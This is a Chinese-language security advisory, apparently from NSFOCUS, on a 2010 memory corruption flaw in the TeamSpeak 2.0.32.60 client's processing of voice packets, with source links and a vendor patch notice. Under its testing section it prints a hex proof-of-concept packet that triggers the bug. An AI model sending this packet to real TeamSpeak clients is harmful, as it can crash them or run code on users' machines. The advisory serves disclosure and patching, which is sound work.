安全研究
安全漏洞
TeamSpeak客户端语音报文处理内存破坏漏洞
发布日期:2010-10-28
更新日期:2010-11-02
受影响系统:TeamSpeak Systems GmbH Teamspeak 2.0.32.60
不受影响系统:TeamSpeak Systems GmbH Teamspeak 2.0.33.7
描述:
BUGTRAQ ID:
44502
TeamSpeak是一种专门为网络游戏玩家设计的IP语音通信系统。
TeamSpeak.exe模块中负责释放动态分配句柄的分解过程中存在内存破坏漏洞。如果客户端向服务器传输了语音传输报文(0xf2),则接收到返回就可以触发这个漏洞,导致执行任意代码。
<*来源:Jokaim
链接:
http://secunia.com/advisories/42014/
http://marc.info/?l=full-disclosure&m=128825895517791&w=2
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
f2be000426ad7e00300000000001000a4141414141414141414241414141414141414141414141414141414141414141414100ff99414141424242424141414141414141414141
建议:
厂商补丁:
TeamSpeak Systems GmbH
----------------------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
http://www.teamspeak.com浏览次数:48801
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载 绿盟科技给您安全的保障 |